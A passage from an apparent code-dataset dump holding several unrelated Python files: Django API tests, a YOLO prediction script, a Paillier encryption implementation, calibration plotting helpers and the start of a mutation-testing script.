import *\nimport json\n\n\nclass TestCompanyViews(TestCase):\n\n def setUp(self):\n self.client = Client()\n self.company_url = reverse('company')\n self.company_detail_url = reverse(\"company_detail\", args=['1'])\n self.company1 = Company.objects.create(\n name=\"asd\",\n employee_number=2499,\n established=1990\n )\n\n def test_check(self):\n assert 1 == 1\n\n def test_company_GET(self):\n response = self.client.get(self.company_url)\n self.assertEquals(response.status_code, status.HTTP_200_OK)\n\n def test_company_detail_GET(self):\n response = self.client.get(self.company_detail_url)\n company1 = Company.objects.get(id=1)\n self.assertEquals(response.status_code, status.HTTP_200_OK)\n self.assertEquals(company1.name, \"asd\")\n self.assertEquals(company1, self.company1)\n\n def test_company_POST(self):\n response = self.client.post(self.company_url, {\n \"name\": \"samsung\",\n \"employee_number\": 25,\n \"established\": 1678\n })\n self.assertEquals(response.status_code, status.HTTP_201_CREATED)\n self.assertEquals(Company.objects.get(id=2).name, \"samsung\")\n self.assertEquals(Company.objects.count(), 2)\n\n def test_company_DELETE(self):\n response = self.client.delete(self.company_detail_url)\n self.assertEquals(response.status_code, status.HTTP_204_NO_CONTENT)\n self.assertEquals(Company.objects.count(), 0)\n\n\nclass TestUserViews(TestCase):\n def setUp(self):\n self.client = Client()\n self.signup_url = reverse('signup')\n self.login_url = reverse('login')\n self.logout_url = reverse('logout')\n self.user = User.objects.create(\n username=\"admin\",\n password=\"admin\",\n email=\"aseke@gmail.com\"\n )\n self.data = {\n \"username\": \"aseke\",\n \"password\": \"admin\",\n \"email\": \"jokker@mail.com\"\n }\n\n def test_check(self):\n assert 1 + 1 == 2\n\n def test_signup(self):\n response = self.client.post(self.signup_url, self.data)\n self.assertEquals(response.status_code, status.HTTP_201_CREATED)\n self.assertEquals(User.objects.count(), 2)\n\n def test_login(self):\n self.client.post(self.signup_url, self.data)\n response = self.client.post(self.login_url, {\n \"username\": \"aseke\",\n \"password\": \"admin\"\n })\n self.assertEquals(response.status_code, status.HTTP_200_OK)\n self.assertEquals(User.objects.get(id=2).email, \"jokker@mail.com\")\n\n def test_logout(self):\n self.client.post(self.signup_url, self.data)\n response1 = self.client.post(self.login_url, {\n \"username\": \"aseke\",\n \"password\": \"admin\"\n })\n token = response1.data['token']\n token = \"Token {}\".format(token)\n response2 = self.client.post(self.logout_url, HTTP_AUTHORIZATION=token)\n self.assertEquals(response2.status_code, status.HTTP_204_NO_CONTENT)\n\n\nclass TestReviewViews(TestCase):\n\n def setUp(self):\n self.client = Client()\n self.review_url = reverse('review')\n self.review_detail_url = reverse(\"review_info\", args=['1'])\n self.review_detail_url2 = reverse(\"review_info\", args=['2'])\n self.signup_url = reverse('signup')\n self.login_url = reverse('login')\n self.data = {\n \"username\": \"aseke\",\n \"password\": \"admin\",\n \"email\": \"jokker@mail.com\"\n }\n self.client.post(self.signup_url, self.data)\n response1 = self.client.post(self.login_url, {\n \"username\": \"aseke\",\n \"password\": \"admin\"\n })\n self.company = Company.objects.create(\n name=\"apple\",\n employee_number=2499909,\n established=1990\n )\n token = response1.data['token']\n self.token = \"Token {}\".format(token)\n self.review_info = {\n \"rating\": 1,\n \"title\": \"not working\",\n \"summary\": \"please fix it\",\n \"company_id\": 1\n }\n\n def test_check(self):\n assert 1 + 1 == 2\n\n def test_review_CREATE(self):\n for i in range(8):\n response = self.client.post(self.review_url, self.review_info, HTTP_AUTHORIZATION=self.token)\n response2 = self.client.post(self.review_url, {\n \"rating\": 6,\n \"title\": \"not working\",\n \"summary\": \"please fix it\",\n \"company_id\": 1\n }, HTTP_AUTHORIZATION=self.token)\n self.assertEquals(Review.objects.count(), 8)\n self.client.post(self.review_url, self.review_info, HTTP_AUTHORIZATION=self.token)\n self.assertEquals(response.status_code, status.HTTP_201_CREATED)\n self.assertEquals(response2.status_code, status.HTTP_400_BAD_REQUEST)\n\n def test_review_DELETE(self):\n for i in range(8):\n self.client.post(self.review_url, self.review_info, HTTP_AUTHORIZATION=self.token)\n self.client.delete(self.review_detail_url, HTTP_AUTHORIZATION=self.token)\n response = self.client.delete(self.review_detail_url2, HTTP_AUTHORIZATION=self.token)\n self.assertEquals(Review.objects.count(), 6)\n self.assertEquals(response.status_code, status.HTTP_204_NO_CONTENT)\n\n def test_review_GET(self):\n self.client.post(self.review_url, self.review_info, HTTP_AUTHORIZATION=self.token)\n self.client.post(self.review_url, {\n \"rating\": 5,\n \"title\": \"good working\",\n \"summary\": \"very good\",\n \"company_id\": 1\n }, HTTP_AUTHORIZATION=self.token)\n response = self.client.get(self.review_detail_url, HTTP_AUTHORIZATION=self.token)\n response2 = self.client.get(self.review_detail_url2, HTTP_AUTHORIZATION=self.token)\n self.assertEquals(response.status_code, status.HTTP_200_OK)\n self.assertEquals(response2.status_code, status.HTTP_200_OK)\n self.assertEquals(response.data['rating'], 1)\n self.assertEquals(response.data['title'], \"not working\")\n cmp = vars(Company.objects.get(id=1))\n del cmp['_state']\n self.assertEquals(dict(response2.data['company']), cmp)\n","sub_path":"project/api/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":6431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"565103067","text":"import fin_gif_complete as fg\nfrom sklearn.datasets import load_boston\nimport pandas as pd\n\ndef main(out_name='boston.gif'):\n\n db = load_boston()\n df = pd.DataFrame(db['data'], columns=db['feature_names'])\n\n x = df['RM'].values\n y = df['TAX'].values\n\n print('ROOM STATS')\n fg.print_table(*fg.stats_table(x))\n\n print('')\n print('TAX STATS')\n fg.print_table(*fg.stats_table(y))\n\n reg, coefs, interps = fg.sgd_regression(x, y)\n fg.print_reg(reg)\n ffg.make_gif(x, y, interps, coefs, 50, save_name=out_name)\n\nif __name__ == '__main__':\n\n main()","sub_path":"intro-to-python-proj/assets/boston.py","file_name":"boston.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"651263492","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.template.defaultfilters import slugify\nfrom river.models.factories import ProceedingMetaObjectFactory\nfrom river.services.proceeding_meta import ProceedingMetaService\n\n\ndef set_slug(apps, schema_editor):\n # We can't import the Person model directly as it may be a newer\n # version than this migration expects. We use the historical version.\n State = apps.get_model(\"river\", \"State\")\n\n for s in State.objects.all():\n s.slug = slugify(s.label)\n s.save()\n\n\ndef build_tree(apps, schema_editor):\n # We can't import the Person model directly as it may be a newer\n # version than this migration expects. We use the historical version.\n ProceedingMeta = apps.get_model(\"river\", \"ProceedingMeta\")\n\n for pm in ProceedingMeta.objects.all():\n ProceedingMetaService.build_tree(pm)\n\n\nclass Migration(migrations.Migration):\n dependencies = [\n ('river', '0003_proceedingmeta_parents'),\n ]\n\n operations = [\n migrations.RunPython(set_slug),\n migrations.RunPython(build_tree)\n ]\n","sub_path":"venv/Lib/site-packages/river/migrations/0004_data_fix.py","file_name":"0004_data_fix.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"282530376","text":"from nets.yolo3 import yolo_body\nfrom keras.layers import Input\nfrom yolo import YOLO\nfrom PIL import Image\nimport numpy as np\nfrom datetime import datetime\n\n\n\nif __name__ == '__main__':\n yolo = YOLO()\n # x = 10\n # photo = []\n # with open('2007_test.txt') as f:\n # file = f.readlines()\n # # print(file[0])\n # for line in file:\n # photo.append(line.split()[0])\n # np.random.seed(int(datetime.timestamp(datetime.now())))\n # np.random.shuffle(photo)\n # np.random.seed(None)\n # for i in range(x):\n if True:\n # img = input('Input image filename:')\n img ='E:/CMPE_master_project/photo/v1780.jpg'\n # print(photo[i])\n try:\n image = Image.open(img)\n except:\n print('Open Error! Try again!')\n # continue\n else:\n # [[type,[top,left,bottom,right],score]\n boxes = yolo.detect_image_boxes(image)\n print(boxes)\n r_image = yolo.detect_image(image)\n r_image.show()\n yolo.close_session()\n","sub_path":"model/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"125991719","text":"# -*- coding: utf-8 -*-\r\n\r\nimport sympy\r\nfrom Crypto.Random import random\r\nfrom Crypto.Util.number import getPrime\r\n\r\n\r\ndef findModReverse(a, m): # 扩展欧几里得算法求模逆 ax=1mod m\r\n a = int(a)\r\n if gcd(a, m) != 1 and gcd(a, m) != -1:\r\n return None\r\n u1, u2, u3 = 1, 0, a\r\n v1, v2, v3 = 0, 1, m\r\n while v3 != 0:\r\n q = u3 // v3\r\n v1, v2, v3, u1, u2, u3 = (u1 - q * v1), (u2 - q * v2), (u3 - q * v3), v1, v2, v3\r\n return u1 % m\r\n\r\n\r\ndef gcd(a, b): # 欧几里得求a和b的最大公因数\r\n if a % b == 0:\r\n return b\r\n else:\r\n return gcd(b, a % b)\r\n\r\n\r\ndef lcm(a, b):\r\n return a // gcd(a, b) * b\r\n\r\n\r\ndef L(u, n):\r\n if (u - 1) % n > 0:\r\n return None\r\n return (u - 1) // n\r\n\r\ndef powmod(a, b, c):\r\n a = a % c\r\n ans = 1\r\n b = int(b)\r\n while b != 0:\r\n if b & 1:\r\n ans = (ans * a) % c\r\n b >>= 1\r\n a = (a * a) % c\r\n return ans\r\n\r\ndef paillier_encryption(m, g, r, n): # 加密运算\r\n c = powmod(g, m, n ** 2) * powmod(r, n, n ** 2) % (n ** 2)\r\n return c\r\n\r\n\r\ndef paillier_decryption(c, g, lamda, n, u):\r\n m = L(powmod(c, lamda, n ** 2), n) * u % n\r\n return m\r\n\r\n\r\ndef key_generation():\r\n p = getPrime(512)\r\n q = getPrime(512)\r\n if p == q:\r\n q = getPrime(128)\r\n n = p * q\r\n lamda = lcm(p - 1, q - 1)\r\n # print(lamda)\r\n\r\n while gcd(n, lamda) > 1:\r\n q = getPrime(512)\r\n if p == q:\r\n q = getPrime(128)\r\n n = p * q\r\n lamda = lcm(p - 1, q - 1)\r\n\r\n g = n + 1\r\n r = random.randint(1, n)\r\n\r\n u = findModReverse(L(powmod(g, lamda, n ** 2), n), n)\r\n # print(g)\r\n return n, g, r, lamda, u\r\n\r\n\r\ndef paillier_generation():\r\n n, g, r, lamda, u = key_generation()\r\n return n, g, r, lamda, u\r\n\r\n\r\n# if __name__ == \"__main__\":\r\n# n, g, r, lamda, u = paillier_generation() # 密钥生成 n,g公钥 lamda,v私钥\r\n#\r\n# m = 10001\r\n# print(\"n\", n)\r\n# print(\"g\", g)\r\n# print(\"r\", r)\r\n# print(\"lamda\", lamda)\r\n# print(\"u\", u)\r\n# c = paillier_encryption(m, r, n) # 加密函数\r\n# m = paillier_decryption(c, g, lamda, n, u) # 解密函数\r\n# print(c)\r\n# print(m)\r\n","sub_path":"client/myapp/paillier.py","file_name":"paillier.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"40337532","text":"import numpy as np\nimport pandas as pd\nimport scipy.stats\nfrom numpyro.infer import MCMC\n\nimport matplotlib.pyplot as plt\nfrom matplotlib import transforms\nfrom matplotlib.patches import Rectangle\n\nfrom code.calibration import calculate_quantiles, calibrate_posterior_predictive\nfrom code.inference import run_diagnostics\nfrom code.metrics import calibration_error, picp\n\n# Colors used for plotting the posterior predictives\nCOLORS = {\n \"true\": \"tab:orange\",\n \"predicted\": \"tab:blue\",\n \"calibrated\": \"tab:pink\",\n \"observations\": \"lightgrey\",\n}\n# Transparency for the posterior predictives\nFILL_ALPHA = 0.15\n\n\ndef plot_true_function(\n func, df, point_estimate=\"mean\", interval=0.95, title=None, legend=True, ax=None\n):\n \"\"\"Plot the true function and the observations\n\n Args:\n func: a scipy.stats distribution\n df: a pandas DataFrame containing observations (x, y)\n point_estimate: either a mean or a median (default: {\"mean\"})\n interval: the width of the predictive interval (default: {0.95})\n title: an optional plot title (default: {None})\n legend: whether to show a legend (default: {True})\n ax: matplotlib axis to draw on, if any (default: {None})\n \"\"\"\n assert point_estimate in {\"mean\", \"median\"}, \"Point estimate must be either 'mean' or 'median'\"\n assert 0 <= interval <= 1\n\n x = np.linspace(df.x.min(), df.x.max(), num=1000)\n distribution = func(x)\n lower, upper = distribution.interval(interval)\n point_est = distribution.mean() if point_estimate == \"mean\" else distribution.median()\n\n ax = ax or plt.gca()\n ax.fill_between(\n x,\n lower,\n upper,\n color=COLORS[\"true\"],\n alpha=FILL_ALPHA,\n label=f\"True {interval*100:.0f}% Interval\",\n )\n ax.scatter(df.x, df.y, s=10, color=COLORS[\"observations\"], label=\"Observations\")\n ax.plot(x, point_est, color=COLORS[\"true\"], label=\"True Mean\")\n if title is not None:\n ax.set_title(title)\n if legend:\n ax.legend(bbox_to_anchor=(1.04, 1), borderaxespad=0)\n\n\ndef plot_posterior_predictive(\n x,\n post_pred,\n func=None,\n df=None,\n point_estimate=\"mean\",\n interval=0.95,\n title=None,\n legend=True,\n ax=None,\n):\n \"\"\"Plot the posterior predictive along with the observations and the true function\n\n Args:\n x: an array of X's of shape (N,), (N, 1) or (1, N)\n post_pred: the posterior predictive, array of shape (M, N),\n where M is the number of samples for each X (e.g. 1000)\n func: the true function, a scipy.stats distribution (default: {None})\n df: a pandas DataFrame of observations (x,y) (default: {None})\n point_estimate: either a mean of a median (default: {\"mean\"})\n interval: the width of the predictive interval (default: {0.95})\n title: an optional plot title (default: {None})\n legend: whether to show a legend (default: {True})\n ax: matplotlib axis to draw on, if any (default: {None})\n \"\"\"\n assert point_estimate in {\"mean\", \"median\"}, \"Point estimate must be either 'mean' or 'median'\"\n assert 0 <= interval <= 1\n\n ax = ax or plt.gca()\n\n if func is not None and df is not None:\n plot_true_function(\n func, df, point_estimate=point_estimate, interval=interval, legend=legend, ax=ax\n )\n\n x = x.ravel()\n lower, upper = np.percentile(post_pred, [2.5, 97.5], axis=0)\n point_est = post_pred.mean(axis=0) if point_estimate == \"mean\" else np.median(post_pred, axis=0)\n\n ax.fill_between(\n x,\n lower,\n upper,\n color=COLORS[\"predicted\"],\n alpha=FILL_ALPHA,\n label=f\"{interval*100:.0f}% Predictive Interval\",\n )\n ax.plot(x, point_est, color=COLORS[\"predicted\"], label=f\"Predicted Mean\")\n ax.set_title(title)\n if legend:\n ax.legend(bbox_to_anchor=(1.04, 1), borderaxespad=0)\n\n\ndef plot_illustration(ppc_func, df, conditionals=True, interval=0.95, title=None):\n \"\"\"Visualize the miscalibrated posterior predictive to illustrate\n the calibration algorithm.\n\n Used on the slide \"The Algorithm Step-by-Step\"\n\n Args:\n ppc_func: a scipy.stats distribution for the posterior predictive\n df: a pandas DataFrame of observations (x, y)\n conditionals: whether to plot the conditional densities (default: {True})\n interval: the width of the predictive interval (default: {0.95})\n title: an optional plot title (default: {None})\n \"\"\"\n # Plot the observations and the predictive interval\n assert 0 <= interval <= 1\n\n fig, ax = plt.subplots(1, 1)\n x = np.linspace(df.x.min(), df.x.max(), num=1000)\n distribution = ppc_func(x)\n lower, upper = distribution.interval(interval)\n\n ax.fill_between(\n x,\n lower,\n upper,\n color=COLORS[\"predicted\"],\n alpha=FILL_ALPHA,\n label=f\"{interval*100:.0f}% Predictive Interval\",\n )\n ax.scatter(df.x, df.y, s=10, color=COLORS[\"observations\"], label=\"Observations\")\n ax.plot(x, distribution.mean(), color=COLORS[\"predicted\"], label=\"Predicted Mean\")\n ax.set(xlabel=\"X\", ylabel=\"Y\")\n if title is not None:\n ax.set_title(title)\n ax.legend(bbox_to_anchor=(1.04, 1), borderaxespad=0)\n ax.set_ylim([-12, 12])\n\n if not conditionals:\n return\n\n # Plot the conditional distribution of Y given X=x_0\n ax2 = fig.add_axes([0.2, 0.235, 0.075, 0.4])\n ax2.axison = False\n\n base = ax2.transData\n rot = transforms.Affine2D().rotate_deg(90)\n\n x_ = np.linspace(-3, 3, num=100)\n density = scipy.stats.norm(loc=0, scale=0.75)\n ax2.plot(x_, density.pdf(x_), transform=rot + base, color=\"tab:gray\")\n\n # Plot the conditional distribution of Y given X=x_1\n ax3 = fig.add_axes([0.5, 0.405, 0.075, 0.2])\n ax3.axison = False\n\n base = ax3.transData\n rot = transforms.Affine2D().rotate_deg(90)\n\n x_ = np.linspace(-3, 3, num=100)\n density = scipy.stats.norm(loc=0, scale=0.55)\n ax3.plot(x_, density.pdf(x_), transform=rot + base, color=\"tab:gray\")\n\n ax.annotate(\"$f(Y|x_0)$\", [-3.23, 4])\n ax.annotate(\"$f(Y|x_1)$\", [0.2, 3.5])\n\n\ndef plot_table(mark_y=False, show_quantiles=None):\n \"\"\"Display a table, accompaining the step-by-step illustration of the algorithm\n\n Args:\n mark_y: whether to draw dashed vertical lines for the location of y (default: {False})\n show_quantiles: the values of quantiles to display, \"predicted\" / \"all\" or None\n (default: {None})\n \"\"\"\n if show_quantiles == \"all\":\n table_params = {\"ncols\": 5, \"figsize\": (10, 4)}\n columns = [\n \"Observation\",\n \"PDF $f(Y|x_t)$\",\n \"CDF $H(x_t)$\",\n \"$H(x_t)(y_t)$\",\n r\"$\\hat{P}(p)$\",\n ]\n elif show_quantiles == \"predicted\":\n table_params = {\"ncols\": 4, \"figsize\": (8, 4)}\n columns = [\"Observation\", \"PDF $f(Y|x_t)$\", \"CDF $H(x_t)$\", \"$H(x_t)(y_t)$\"]\n else:\n table_params = {\"ncols\": 3, \"figsize\": (6, 4)}\n columns = [\"Observation\", \"PDF $f(Y|x_t)$\", \"CDF $H(x_t)$\"]\n\n fig, ax = plt.subplots(nrows=5, **table_params)\n\n for a in ax.flatten():\n a.set_xticklabels([])\n a.set_yticklabels([])\n a.set_xticks([])\n a.set_yticks([])\n a.margins(0.2)\n\n plt.subplots_adjust(wspace=0.0, hspace=0)\n\n for i, column in enumerate(columns):\n ax[0, i].set_title(column)\n\n rows = [\"$(x_0, y_0)$\", \"$(x_1, y_1)$\", r\"$\\ldots$\", r\"$\\ldots$\", \"$(x_t, y_t)$\"]\n for i, row in enumerate(rows):\n ax[i, 0].annotate(row, xy=[0.5, 0.5], size=15, ha=\"center\", va=\"center\")\n\n x_ = np.linspace(-3, 3, num=100)\n scales = [1, 0.5, 0.75, 1.25, 1.5]\n for i, std in enumerate(scales):\n ax[i, 1].plot(x_, scipy.stats.norm.pdf(x_, loc=0, scale=std))\n ax[i, 2].plot(x_, scipy.stats.norm.cdf(x_, loc=0, scale=std))\n\n # Illustrative predictive and empirical quantiles (obtained via isotonic regression)\n quantiles = [0.8, 0.8, 0.2, 0.4, 0.6]\n empirical = [0.638443, 0.638443, 0.3569105, 0.44220539, 0.56308756]\n\n if mark_y:\n for i, quantile in enumerate(quantiles):\n distribution = scipy.stats.norm(loc=0, scale=scales[i])\n value = distribution.ppf(quantile)\n ax[i, 1].plot([value] * 2, [0, distribution.pdf(value)], linestyle=\"--\")\n ax[i, 2].plot([value] * 2, [0, distribution.cdf(value)], linestyle=\"--\")\n\n if show_quantiles in [\"predicted\", \"all\"]:\n for i, quantile in enumerate(quantiles):\n ax[i, 3].annotate(quantile, xy=[0.5, 0.5], size=15, ha=\"center\", va=\"center\")\n\n if show_quantiles in [\"all\"]:\n for i, quantile in enumerate(empirical):\n ax[i, 4].annotate(f\"{quantile:.2f}\", xy=[0.5, 0.5], size=15, ha=\"center\", va=\"center\")\n\n ax4 = plt.gcf().add_axes([0.595, 0.59, 0.303, 0.28])\n ax4.axison = False\n ax4.add_patch(\n Rectangle(\n (0, 0.01),\n 0.99,\n 0.99,\n linewidth=1,\n linestyle=\"--\",\n edgecolor=\"tab:red\",\n facecolor=\"none\",\n )\n )\n\n\ndef plot_ecdf(predicted_quantiles):\n \"\"\"Visualize the empirical CDF\n\n Used in the step-by-step illustration of the calibration algorithm.\n\n Args:\n predicted_quantiles: the values of the quantiles for each observed Y\n \"\"\"\n plt.hist(predicted_quantiles, bins=50, cumulative=True, density=True, alpha=0.3)\n plt.title(\"CDF of Predicted Quantiles\")\n plt.xlabel(\"Predicted Quantiles, $H(x_t)(y_t)$\")\n plt.ylabel(r\"Empirical Quantiles, $\\hat{P}(p_t)$\")\n\n\ndef calibration_plot(predicted_quantiles, model, title=None):\n \"\"\"Visualize a calibration plot suggested by the authors\n\n Args:\n predicted_quantiles: the values of the quantiles for each Y in the dataset\n model: an isotonic regression object (trained in forward mode from predicted to empirical\n quantiles)\n \"\"\"\n # Choose equally spaced quantiles\n expected_quantiles = np.linspace(0, 1, num=11).reshape(-1, 1)\n\n # Compute the probabilities of predicted quantiles at the discrete quantile levels\n T = predicted_quantiles.shape[0]\n observed_uncalibrated = (predicted_quantiles.reshape(1, -1) <= expected_quantiles).sum(\n axis=1\n ) / T\n\n # Use the model to output the actual probabilities of any quantile\n calibrated_quantiles = model.predict(predicted_quantiles)\n # Estimate the observed calibrated quantiles\n observed_calibrated = (calibrated_quantiles.reshape(1, -1) <= expected_quantiles).sum(\n axis=1\n ) / T\n\n # Plot the results\n plt.plot(\n expected_quantiles,\n observed_uncalibrated,\n marker=\"o\",\n color=COLORS[\"predicted\"],\n label=\"Uncalibrated\",\n )\n plt.plot(\n expected_quantiles,\n observed_calibrated,\n marker=\"o\",\n color=COLORS[\"calibrated\"],\n label=\"Calibrated\",\n )\n plt.plot([0, 1], [0, 1], color=\"tab:grey\", linestyle=\"--\", zorder=0)\n plt.title(title or \"Calibration Plot\")\n plt.xlabel(\"Expected Quantiles\")\n plt.ylabel(\"Observed Quantiles\")\n plt.legend()\n\n\ndef plot_calibration_results(\n result, qc, func, interval=0.95, figsize=(8.5, 3.5), point_est=\"median\"\n):\n \"\"\"Plot the posterior predictive before and after calibration\n\n Args:\n result: a result diction returned by calibrate()\n qc: a fitted QuantileCalibration object\n df: a pandas DataFrame of observations (x, y)\n func: the true function, a scipy.stats distribution\n interval: the width of the predictive interval (default: {0.95})\n figsize: the overall size of the matplotlib figure, which will be split in\n two subplots (default: {(8.5, 3.5)})\n point_est: indicate whether to use mean or median as the point estimate\n \"\"\"\n assert point_est in {\"mean\", \"median\"}, \"Point estimate must be either 'mean' or 'median'\"\n\n x = result[\"X_test\"].ravel()\n post_pred = result[\"post_pred\"]\n if point_est == \"mean\":\n calibrated_post_pred = calibrate_posterior_predictive(result[\"post_pred\"], qc)\n post_pred_x = result[\"post_pred_x\"]\n\n df = result[\"df\"]\n\n assert 0 <= interval <= 1\n q_alpha = (1 - interval) / 2\n low, high = 1 - interval - q_alpha, interval + q_alpha\n q = [low, 0.5, high]\n quantiles = [q, qc.inverse_transform(q)]\n titles = [\"Before Calibration\", \"After Calibration\"]\n\n fig, ax = plt.subplots(1, 2, figsize=figsize, sharex=True, sharey=True)\n\n for i, axis in enumerate(ax):\n # Plot the true function\n distribution = func(x)\n lower, upper = distribution.interval(interval)\n true_interval = axis.fill_between(\n x,\n lower,\n upper,\n color=COLORS[\"true\"],\n alpha=FILL_ALPHA,\n label=f\"True {interval*100:.0f}% Interval\",\n )\n axis.scatter(df.x, df.y, s=3, color=COLORS[\"observations\"], label=\"Observations\")\n if point_est == \"mean\":\n point_est_value = distribution.mean()\n true_label = \"True Mean\"\n else:\n point_est_value = distribution.median()\n true_label = \"True Median\"\n true_point_est = axis.plot(x, point_est_value, color=COLORS[\"true\"], label=true_label)\n axis.set_title(titles[i])\n\n lower, median, upper = np.quantile(post_pred, quantiles[i], axis=0)\n predicted_interval = axis.fill_between(\n x,\n lower,\n upper,\n color=COLORS[\"predicted\"],\n alpha=FILL_ALPHA,\n label=f\"{interval*100:.0f}% Predictive Interval\",\n )\n if point_est == \"mean\":\n mean = np.mean(calibrated_post_pred, axis=0)\n predicted_point_est = axis.plot(\n x, mean, color=COLORS[\"predicted\"], label=f\"Predicted Mean\"\n )\n else:\n predicted_point_est = axis.plot(\n x, median, color=COLORS[\"predicted\"], label=f\"Predicted Median\"\n )\n\n # Compute the calibration error and PICP, before calibration\n uncalibrated_quantiles = calculate_quantiles(post_pred_x.T, df[[\"y\"]].values)\n cal_error = calibration_error(uncalibrated_quantiles)\n picp_value = picp(uncalibrated_quantiles, interval=interval)\n\n ax[0].text(\n 0.96,\n 0.06,\n f\"Calibr. {cal_error:.3f}\\nPICP {picp_value:.3f}\",\n horizontalalignment=\"right\",\n transform=ax[0].transAxes,\n )\n # After calibration:\n calibrated_quantiles = qc.transform(uncalibrated_quantiles)\n cal_error = calibration_error(calibrated_quantiles)\n picp_value = picp(calibrated_quantiles, interval=interval)\n\n ax[1].text(\n 0.96,\n 0.06,\n f\"Calibr. {cal_error:.3f}\\nPICP {picp_value:.3f}\",\n horizontalalignment=\"right\",\n transform=ax[1].transAxes,\n )\n\n # Add a legend under the plots\n handles = [true_interval, true_point_est[0], predicted_interval, predicted_point_est[0]]\n labels = [h.get_label() for h in handles]\n fig.legend(handles, labels, loc=\"lower center\", ncol=len(labels))\n fig.tight_layout(rect=(0, 0.1, 1, 1))\n\n\ndef check_convergence(res_main, res_holdout, func, plot=True, point_estimate=\"median\"):\n \"\"\"Print basic diagnostic metrics for each trained dataset and optinally plot the\n posterior predictives for visual checks.\n\n The diagnostic metrics are the Effective Sample Size and the Gelman-Rubin test. These\n are only available for posteriors obtained via sampling. For VI posteriors one needs\n to perform a visual check.\n\n Args:\n res_main: a dictionary of fitted objects for the main dataset (model, inference\n object, the posterior predictive, etc.)\n res_holdout: a similar dictionary of fitted objects for the hold-out dataset\n func: the true function, a scipy.stats distribution\n plot: whether to plot the posterior predictives. If set to False, only textual\n information will be printed, if available (default: {True})\n point_estimate: either a median or a mean (default: {\"median\"})\n \"\"\"\n assert point_estimate in {\"mean\", \"median\"}, \"Point estimate must be either 'mean' or 'median'\"\n\n data = {\"Main dataset\": res_main, \"Hold-out dataset\": res_holdout}\n\n for name, res in data.items():\n if isinstance(res[\"infer\"], MCMC):\n # Compute basic diagnostic tests for an MCMC model\n diagnostics = run_diagnostics(res[\"infer\"])\n else:\n diagnostics = None\n\n if plot:\n plt.figure()\n plot_posterior_predictive(\n res[\"X_test\"],\n res[\"post_pred\"],\n func=func,\n df=res[\"df\"],\n title=name,\n point_estimate=point_estimate,\n )\n\n # Print the results of diagnostic tests\n if diagnostics:\n message = (\"Minimum ESS: {min_ess:,.2f}\\nMax Gelman-Rubin: {max_rhat:.2f}\").format(\n **diagnostics\n )\n plt.gcf().text(0.95, 0.15, message)\n else:\n if diagnostics:\n print(\n \"{name}: minimum ESS {min_ess:,.2f}, \"\n \"maximum Gelman-Rubin {max_rhat:.2f}\".format(name=name, **diagnostics)\n )\n\n\ndef plot_calibration_slice(result, slice_locations, qc, figsize=(8.5, 3.5)):\n \"\"\"Plots calibrated vs uncalibrated posterior predictive cross-sections.\n\n Args:\n result: a result diction returned by calibrate()\n slice_locations: numpy array, quantiles of X_test values at which to draw cross-sections\n qc: a fitted QuantileCalibration object\n \"\"\"\n\n cal_post_pred = calibrate_posterior_predictive(result[\"post_pred\"], qc)\n slices = np.floor(cal_post_pred.shape[1] * slice_locations).astype(int)\n\n uncal_lower_limit = np.min(\n np.apply_along_axis(lambda x: np.quantile(x, 0.02), 0, result[\"post_pred\"][:, slices])\n )\n cal_lower_limit = np.min(\n np.apply_along_axis(lambda x: np.quantile(x, 0.02), 0, cal_post_pred[:, slices])\n )\n lower_limit = min(uncal_lower_limit, cal_lower_limit)\n\n uncal_upper_limit = np.max(\n np.apply_along_axis(lambda x: np.quantile(x, 0.98), 0, result[\"post_pred\"][:, slices])\n )\n cal_upper_limit = np.max(\n np.apply_along_axis(lambda x: np.quantile(x, 0.98), 0, cal_post_pred[:, slices])\n )\n upper_limit = max(uncal_upper_limit, cal_upper_limit)\n\n x_values = result[\"X_test\"][slices]\n\n fig, ax = plt.subplots(1, 2, figsize=figsize, sharey=True, tight_layout=True)\n for idx in range(len(slices)):\n pp_df = pd.DataFrame(\n {\n \"Uncalibrated\": result[\"post_pred\"][:, slices[idx]],\n \"Calibrated\": cal_post_pred[:, slices[idx]],\n }\n )\n pp_df.plot.kde(\n ax=ax[idx],\n xlim=(lower_limit, upper_limit),\n color=[COLORS[\"predicted\"], COLORS[\"calibrated\"]],\n )\n ax[idx].set_title(f\"Posterior Predictive at $X={x_values[idx][0]:.2f}$\")\n ax[idx].set_xlabel(\"Y\")\n","sub_path":"report/code/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":19208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"313826734","text":"#!/usr/bin/env python3\n\nimport os\nimport argparse\nimport subprocess\nfrom parsers.javaParser import JavaParser\nfrom operators.javaOperators import LCR, AOR, ROR, ABS, UOI\n\ncompiler = 'javac'\nmutantsDirectory = 'mutants/'\noriginalBupFile = '_original.bup'\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('sourceFilePath', help='path to the java source file for which we need to generate mutants')\n parser.add_argument('sourcePackagePath', help='path to the java package that contains the src file')\n parser.add_argument('testFilePath', help='path to the JUnit test file for the provided source file')\n parser.add_argument('testPackagePath', help='path to the java package that contains the provided test file')\n args = parser.parse_args()\n\n sourceFilePath = args.sourceFilePath[0] == '/' and args.sourceFilePath or os.path.join(os.getcwd(), args.sourceFilePath)\n sourcePackagePath = args.sourcePackagePath[0] == '/' and args.sourcePackagePath or os.path.join(os.getcwd(), args.sourcePackagePath)\n testFilePath = args.testFilePath[0] == '/' and args.testFilePath or os.path.join(os.getcwd(), args.testFilePath)\n testPackagePath = args.testPackagePath[0] == '/' and args.testPackagePath or os.path.join(os.getcwd(), args.testPackagePath)\n\n # setup classpath\n classpath = [sourcePackagePath, testPackagePath]\n\n junitLocation = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'junit/')\n for file in 